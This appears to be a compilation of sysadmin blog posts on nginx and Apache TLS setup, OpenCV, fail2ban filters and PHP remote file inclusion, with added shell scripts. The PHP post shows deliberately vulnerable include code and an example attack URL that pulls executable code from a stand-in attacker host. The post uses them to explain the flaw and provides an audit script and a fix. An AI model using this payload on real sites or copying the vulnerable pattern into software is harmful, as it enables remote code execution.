HTTPS/TLS on NginX and getting a certificate signed by a certificate authority

Today I decided to switch my website over to HTTPS and get a signed certificate for it. I took the Comodo CA option and went for the free 30-day trial; if things go smoothly I might go ahead and purchase a certificate plan. I also learnt about the three standardised levels of validation that certificate authorities offer. All three give you the same TLS encryption; what differs is how much identity the CA has checked before signing.

Domain Validation (DV): the CA only checks that you control the domain, typically by emailing an address listed in the domain's WHOIS record (or a well-known address such as admin@ the domain). This is the cheapest kind and the one I am using for this website at the moment. If you handle financial transactions on your site it is better to get at least an OV certificate, explained next.

Organisation Validation (OV): the CA additionally verifies your organisation's legal details before issuing, so the certificate vouches for who runs the site and not just for who controls the DNS.

Extended Validation (EV): issued only after far more intensive checks on the organisation. At the time of writing, sites using an EV certificate get the green address bar with the company name shown alongside, as bank websites do (the major browsers have since removed that special EV display, so it is no longer a reason on its own to pay for EV).

Installing the certificate is quite easy. First test that things work with SSL on your nginx server. Create a directory to hold the key and certificates:

sudo mkdir /etc/nginx/ssl

Then create a private key and a self-signed certificate for testing (the CA-signed certificate replaces the self-signed one later and is issued for the same key):

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/ssl/example.com.key...
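The test setup above, written out as a script (an added example, not the post's own commands): it generates the key, a self-signed certificate for testing, and the CSR you send to the CA, checks that a certificate really belongs to the key, and emits the nginx server block. It assumes OpenSSL 1.1.1 or newer (for -addext, which adds the subjectAltName that browsers require; they no longer accept a CN alone) and an nginx new enough for TLS 1.3. The output directory, domain and web root are parameters chosen for the demo. One practitioner's gotcha is built in: -nodes leaves the key unencrypted so nginx can start unattended, so the script restricts the file mode instead, and the ssl_certificate file is expected to contain the server certificate followed by the CA's intermediate certificates, concatenated, or browsers will report an incomplete chain.

```shell
#!/bin/sh
# Added example; not code from the original post. Assumes OpenSSL >= 1.1.1
# (for -addext) and nginx with ssl support. Paths and names are demo values.

# Create a 2048-bit RSA key, a self-signed cert for testing, and a CSR for the CA.
# $1 = output directory, $2 = domain
make_site_keys() {
  dir=$1; domain=$2
  mkdir -p "$dir"
  # -nodes: no passphrase, so nginx can start unattended; compensate with file perms
  openssl req -x509 -nodes -sha256 -days 365 -newkey rsa:2048 \
    -keyout "$dir/$domain.key" -out "$dir/$domain.selfsigned.crt" \
    -subj "/CN=$domain" \
    -addext "subjectAltName=DNS:$domain,DNS:www.$domain"
  chmod 600 "$dir/$domain.key"
  # CSR for the CA, signed by the same private key the CA-issued cert will use
  openssl req -new -sha256 -key "$dir/$domain.key" -out "$dir/$domain.csr" \
    -subj "/CN=$domain" \
    -addext "subjectAltName=DNS:$domain,DNS:www.$domain"
}

# Does certificate $1 belong to private key $2? Compares the public keys
# (works for the self-signed test cert and for the one the CA sends back).
cert_matches_key() {
  c=$(openssl x509 -in "$1" -noout -pubkey | openssl sha256)
  k=$(openssl pkey -in "$2" -pubout | openssl sha256)
  [ "$c" = "$k" ]
}

# Emit the nginx configuration. $1 = domain, $2 = certificate file (server cert
# followed by the CA's intermediates, concatenated), $3 = private key
nginx_ssl_server() {
  cat <<EOF
server {
    listen 443 ssl;
    server_name $1 www.$1;
    ssl_certificate     $2;
    ssl_certificate_key $3;
    ssl_protocols TLSv1.2 TLSv1.3;      # no SSLv3 / TLS 1.0 / TLS 1.1
    ssl_prefer_server_ciphers on;
    root /var/www/$1;
}
server {
    listen 80;
    server_name $1 www.$1;
    return 301 https://\$host\$request_uri;   # send plain HTTP to HTTPS
}
EOF
}

# Demo in a throwaway directory (constructed; not the real /etc/nginx/ssl)
demo_dir=$(mktemp -d)
make_site_keys "$demo_dir" example.com
cert_matches_key "$demo_dir/example.com.selfsigned.crt" "$demo_dir/example.com.key" \
  && echo "key and certificate match"
nginx_ssl_server example.com "$demo_dir/example.com.selfsigned.crt" "$demo_dir/example.com.key"
```

Run cert_matches_key again against the certificate the CA returns before you swap it in; a mismatch there usually means the CSR was regenerated with a fresh key in between. After editing the nginx config, `nginx -t` and then reload.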

Playing with OpenCV Vision Library on Ubuntu 14.04 x86_64

I have started playing with OpenCV as part of my work on security systems. I haven't found any Perl libraries for it except Image::Resize::OpenCV, Cv::* and Image::ObjectDetect, which I might look at later; for now I will start with the Python bindings. At a later stage I might decide to write a Perl binding for the OpenCV library. No commitments yet; it depends on my needs 🙂 For starters, here is what I do:

sudo apt-get install libavformat-dev libcv2.4 libhighgui2.4 python-opencv opencv-doc libcv-dev libcvaux-dev libhighgui-dev

There are a few Python examples in /usr/share/doc/opencv-doc/examples/python and in /usr/share/doc/opencv-doc/examples/python2. I will start off by trying...

Setting up fail2ban for my servers

In view of increased attacks on my server from Ukraine and China I decided to harden its security. After the usual blocking of unused ports with the firewall, one of my favourite tools for the job is fail2ban. It works by scanning your log files for suspected intrusion attempts or attacks and blocking the offending source. It ships with filters for standard log files such as SSH, but if you run a custom web app you may have to write your own filter to stop attacks on the site. This is much better than blocking offending users inside the web app, because fail2ban uses iptables to stop the offending IP address from contacting your server at all instead of serving it a "not allowed" page.

To configure fail2ban, first look at your web application's logs and note the message your app writes when a login attempt fails, i.e. try to log in with an invalid account on your website and see what gets logged. If your app does not log anything, add logging to your code so that it writes a message containing the source IP address of the user. In my case the message is simple:

Failed login from <ip address>

Create an appropriate filter file:

vim /etc/fail2ban/filter.d/shantanubhadoria.conf

and enter the following in it:

# Fail2Ban shantanubhadoria.com filter
[Definition]
failregex = Failed login from <HOST>
ignoreregex =

You can add more than one regex for conditions other than authentication failure to ban people from...
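To see what that filter will actually do before pointing fail2ban at a live log, here is an added example (not the post's code) that writes the filter plus a jail that uses it, and runs the same failregex over a few constructed log lines with grep to show which addresses would reach maxretry. It approximates fail2ban's matching: fail2ban's <HOST> token also matches IPv6 addresses and host names, while this narrows it to IPv4, and the real check is `fail2ban-regex <logfile> <filterfile>`. The log path, jail name, maxretry, findtime and bantime are assumptions. Two caveats worth knowing: fail2ban needs the line to carry the real client address, so if the app sits behind a reverse proxy log the X-Forwarded-For client, not the proxy, or you will ban your own proxy; and the jail must name the same log file the app writes to, or nothing is ever matched.

```shell
#!/bin/sh
# Added example; not code from the original post. Approximates fail2ban's
# matching with grep for an offline sanity check. For the real thing run:
#   fail2ban-regex /var/log/myapp/app.log /etc/fail2ban/filter.d/shantanubhadoria.conf
# Log path, jail name and thresholds below are assumptions.

FAILREGEX='Failed login from <HOST>'
# fail2ban's <HOST> also matches IPv6 and hostnames; this narrows it to IPv4
HOST_RE='([0-9]{1,3}\.){3}[0-9]{1,3}'

# Constructed sample log (not real traffic); documentation-range addresses
SAMPLE_LOG='Mar 20 10:01:02 web myapp[1234]: Failed login from 203.0.113.7
Mar 20 10:01:05 web myapp[1234]: Failed login from 203.0.113.7
Mar 20 10:01:09 web myapp[1234]: Successful login from 198.51.100.9
Mar 20 10:01:12 web myapp[1234]: Failed login from 198.51.100.9
Mar 20 10:01:20 web myapp[1234]: Failed login from 203.0.113.7
Mar 20 10:01:31 web myapp[1234]: GET /faq 200
Mar 20 10:01:44 web myapp[1234]: Failed login from 203.0.113.7'

# Turn the fail2ban-style regex into a grep ERE by substituting <HOST> (POSIX sh only)
failregex_to_ere() {
  prefix=${FAILREGEX%%<HOST>*}
  suffix=${FAILREGEX#*<HOST>}
  printf '%s' "$prefix($HOST_RE)$suffix"
}

# Read log lines on stdin; print "ip count" for every IP the failregex matched
failed_ips() {
  grep -oE "$(failregex_to_ere)" | grep -oE "$HOST_RE" | sort | uniq -c | awk '{print $2, $1}'
}

# Print the IPs whose failure count reached maxretry ($1): what fail2ban would ban
ban_candidates() {
  failed_ips | awk -v max="$1" '$2 >= max {print $1}'
}

# Write the filter and a jail that uses it. $1 = fail2ban config root (/etc/fail2ban)
write_fail2ban_config() {
  mkdir -p "$1/filter.d" "$1/jail.d"
  cat >"$1/filter.d/shantanubhadoria.conf" <<EOF
# Fail2Ban shantanubhadoria.com filter
[Definition]
failregex = $FAILREGEX
ignoreregex =
EOF
  cat >"$1/jail.d/shantanubhadoria.conf" <<'EOF'
# Jail for the custom web app; logpath is an assumed value for this example
[shantanubhadoria]
enabled  = true
filter   = shantanubhadoria
logpath  = /var/log/myapp/app.log
port     = http,https
maxretry = 3
findtime = 600
bantime  = 3600
EOF
}

# Demo: which of the constructed sample's addresses would be banned at maxretry = 3
printf '%s\n' "$SAMPLE_LOG" | ban_candidates 3
```

Write the config with `write_fail2ban_config /etc/fail2ban` as root, then `fail2ban-client reload` and watch `fail2ban-client status shantanubhadoria` while you deliberately fail a few logins from a test address.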

PHP and include url exploit

Unlike most vulnerabilities, which stem from a faulty version of some app that many people use, this one crops up primarily on sites containing PHP code that people write themselves. Cleaning up the resulting messes is getting a little tedious, so even though this is hardly a new exploit, I wanted to write a bit about what the vulnerability is, how it works, how spammers exploit it, and how to keep your site safe.

Let's start with the problem code. If you've written a PHP script on your site that contains code similar to the below, you're probably vulnerable:

$page = $_GET['page'] . ".php";
include($page);

A lot of people seem to use code like this. If they call this script exploitme.php, the URLs for these sites wind up looking like this:

http://example.nfshost.com/exploitme.php?page=main
http://example.nfshost.com/exploitme.php?page=contact
http://example.nfshost.com/exploitme.php?page=faq

Then they put the body of each page into main.php, contact.php, and faq.php, put the stuff that's the same on every page in exploitme.php and, presto, instant mini-CMS.

How does this get exploited? When interacting with this script, the attacker has no need to limit themselves to the URLs the page author intended. What they use instead tends to look like this:

http://example.nfshost.com/exploitme.php?page=http://badsite.example.com/urhacked.txt%3F

The %3F is a URL-encoded "?", so the ".php" the script appends lands in the query string of the remote URL instead of in the file name, and the remote server simply ignores it. Most people don't know that include() will happily pull in the contents of that urhacked.txt file from some other site and execute it. The other site doesn't even have to be running PHP; the exploit code could be on some other already-hacked site, or anywhere the attacker can put a text file. The urhacked.txt file actually contains...
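An added example (not the post's code) for the clean-up side of this: a shell script that builds a throwaway web root containing the post's vulnerable exploitme.php next to a hardened rewrite, and a grep-based audit that flags any .php file which passes request data to include/require, either directly or through a variable assigned from $_GET/$_POST/$_REQUEST/$_COOKIE/$_SERVER. The audit is a one-hop heuristic, not a taint analysis, so it can miss indirection through functions and arrays; treat its output as a starting list. The hardened version uses the request value only as a key into a fixed map, so the included path is always one of three literals under the script's own directory. The file names, the sample web root and the pages/ layout are constructed for the demo. As belt and braces, the script can also check allow_url_include, which has defaulted to Off since PHP 5.2 and stops remote URLs in include() even where vulnerable code remains (it does nothing against local file inclusion, which is why the code fix is still needed).

```shell
#!/bin/sh
# Added example; not code from the original post. Heuristic audit for the
# include-from-request pattern plus a hardened rewrite. Sample web root is constructed.

# Build a throwaway web root with the post's vulnerable script and a safe version
make_sample_webroot() {
  mkdir -p "$1/pages"
  # Vulnerable (as in the post): whatever ?page= says gets included, even a URL
  cat >"$1/exploitme.php" <<'EOF'
<?php
$page = $_GET['page'] . ".php";
include($page);
EOF
  # Hardened: the request value only selects a key in a fixed map, so the
  # included path is always one of three literals under this script's directory
  cat >"$1/safe.php" <<'EOF'
<?php
$pages = array('main' => 'main.php', 'contact' => 'contact.php', 'faq' => 'faq.php');
$key   = isset($_GET['page']) ? $_GET['page'] : 'main';
$file  = isset($pages[$key]) ? $pages[$key] : $pages['main'];
include __DIR__ . '/pages/' . $file;
EOF
  for p in main contact faq; do printf '<p>%s</p>\n' "$p" >"$1/pages/$p.php"; done
}

# ERE fragments: an include/require call head, and a request superglobal
INC='(include|require)(_once)?[[:space:]]*\(?[[:space:]]*'
SUPER='\$_(GET|POST|REQUEST|COOKIE|SERVER)'

# Print every .php file under $1 that includes/requires request data, either
# directly or via a variable assigned from a superglobal (one hop; heuristic)
scan_php_includes() {
  find "$1" -name '*.php' | sort | while read -r f; do
    if grep -qE "$INC$SUPER" "$f"; then printf '%s\n' "$f"; continue; fi
    # variables assigned (on one line) from a superglobal ...
    grep -oE "\\\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=[^=].*$SUPER" "$f" \
      | grep -oE '^\$[A-Za-z_][A-Za-z0-9_]*' | sort -u | while read -r v; do
        name=${v#?}
        # ... that are later handed to include/require
        if grep -qE "$INC\\\$$name([^A-Za-z0-9_]|\$)" "$f"; then printf '%s\n' "$f"; fi
      done
  done
}

# Is remote inclusion disabled in the running PHP? 0 = off, 1 = on, 2 = no php binary
check_allow_url_include() {
  command -v php >/dev/null 2>&1 || { echo "php not found"; return 2; }
  v=$(php -r 'echo ini_get("allow_url_include");')
  [ "$v" = "" ] || [ "$v" = "0" ]     # ini_get reports Off as "" or "0"
}

# Demo: only exploitme.php should be reported
demo=$(mktemp -d)
make_sample_webroot "$demo"
scan_php_includes "$demo"
```

On a real host, run `scan_php_includes /var/www` and read each hit by hand; then fix the code rather than relying on the ini setting alone.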

Setting up Secure Socket Layer / Transport Layer Security ( SSL / TLS ) on APACHE webserver

SSL allows relatively secure connections over HTTP using a key and certificate pair for the HTTP server. To enable HTTPS connections the web server needs a certificate set up. The following instructions deal with setting up SSL on a generic Linux Apache server but can be generalised to most UNIX distributions. I used the Apache web server on my Ubuntu (Hardy Heron) laptop as my testing base for setting up Secure Socket Layer (SSL).

Installing OpenSSL: the first step before you do anything is to install OpenSSL on your machine. On Ubuntu OpenSSL comes installed by default; you can check by typing the following at the command line. OpenSSL is a useful tool that lets you generate SSL keys and certificates and do tons of other useful things with SSL.

$ openssl

If you get something like "command not found", you need to install OpenSSL. Here is the command for Ubuntu:

$ sudo apt-get install openssl

For Fedora you might try:

$ yum install openssl

After this you will have OpenSSL installed.

Getting mod_ssl: mod_ssl is the Apache module that actually lets you set up HTTPS connections. It depends on an installation of OpenSSL, so before you enable it make sure OpenSSL is installed. To check whether mod_ssl is present, run the following command:

$ apache2 -l

This lists the modules compiled into the Apache binary; however, it might not work on some systems. If that is the case you can try the following:

$ httpd -l

Use the appropriate path to the apache2 or httpd binary if neither of the above works. Note that -l only shows statically compiled modules; on Ubuntu mod_ssl is built as a shared module, so it will not appear there even when installed, and "apache2ctl -M" (or "httpd -M") is what lists the modules actually loaded. On Ubuntu...
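The rest of the procedure, as an added example that is not the post's own commands: a check that mod_ssl is actually loaded (using -M, since -l misses shared modules), a generator for a TLS virtual host with protocol and cipher settings tightened beyond the defaults, and the Debian/Ubuntu steps to enable the module and the site. It assumes the Debian/Ubuntu apache2 layout (a2enmod, a2ensite, /etc/apache2/sites-available), Apache 2.4 built against OpenSSL 1.0.1 or newer, and that the key and certificate already exist (for example from the openssl req command in the nginx post above); the ServerName, certificate and key paths are parameters. SSLCertificateChainFile still works but is deprecated from Apache 2.4.8, where the intermediates can simply be appended to the SSLCertificateFile.

```shell
#!/bin/sh
# Added example; not code from the original post. Assumes the Debian/Ubuntu
# apache2 layout and Apache 2.4 with OpenSSL >= 1.0.1. Paths are parameters.

# Is mod_ssl loaded? `apache2 -l` only lists statically compiled modules and on
# Debian/Ubuntu mod_ssl is a shared module, so ask for the loaded set instead.
# Returns 0 = loaded, 1 = not loaded, 2 = no Apache control binary found.
check_mod_ssl() {
  if command -v apache2ctl >/dev/null 2>&1; then ctl=apache2ctl
  elif command -v apachectl >/dev/null 2>&1; then ctl=apachectl
  elif command -v httpd >/dev/null 2>&1; then ctl=httpd
  else return 2; fi
  "$ctl" -M 2>/dev/null | grep -q 'ssl_module'
}

# Emit a TLS virtual host. $1 = ServerName, $2 = certificate file,
# $3 = private key, $4 = optional CA chain (intermediate) file
ssl_vhost() {
  cat <<EOF
<IfModule mod_ssl.c>
<VirtualHost *:443>
    ServerName $1
    DocumentRoot /var/www/$1
    SSLEngine on
    SSLCertificateFile    $2
    SSLCertificateKeyFile $3
EOF
  if [ -n "${4:-}" ]; then printf '    SSLCertificateChainFile %s\n' "$4"; fi
  cat <<'EOF'
    # SSLv2/SSLv3 and TLS 1.0/1.1 are broken or deprecated. On Apache 2.2 use
    # "all -SSLv2 -SSLv3" instead, since 2.2 does not know the TLSv1.1 token.
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1
    SSLHonorCipherOrder on
    SSLCipherSuite HIGH:!aNULL:!MD5:!RC4:!3DES
</VirtualHost>
</IfModule>
EOF
}

# Install the vhost, enable mod_ssl and the site, test the config, restart.
# Needs root. Arguments as for ssl_vhost.
install_ssl_site() {
  ssl_vhost "$@" >"/etc/apache2/sites-available/$1-ssl.conf"
  a2enmod ssl
  a2ensite "$1-ssl.conf"
  apache2ctl configtest && service apache2 restart
}

# Demo (no root needed): show the generated config and the module status
ssl_vhost example.com /etc/ssl/certs/example.com.crt /etc/ssl/private/example.com.key
check_mod_ssl && echo "mod_ssl loaded" || echo "mod_ssl not loaded or Apache not found (rc=$?)"
```

After install_ssl_site, confirm from outside with `openssl s_client -connect example.com:443 -servername example.com` and check that the chain verifies and that an SSLv3 handshake is refused.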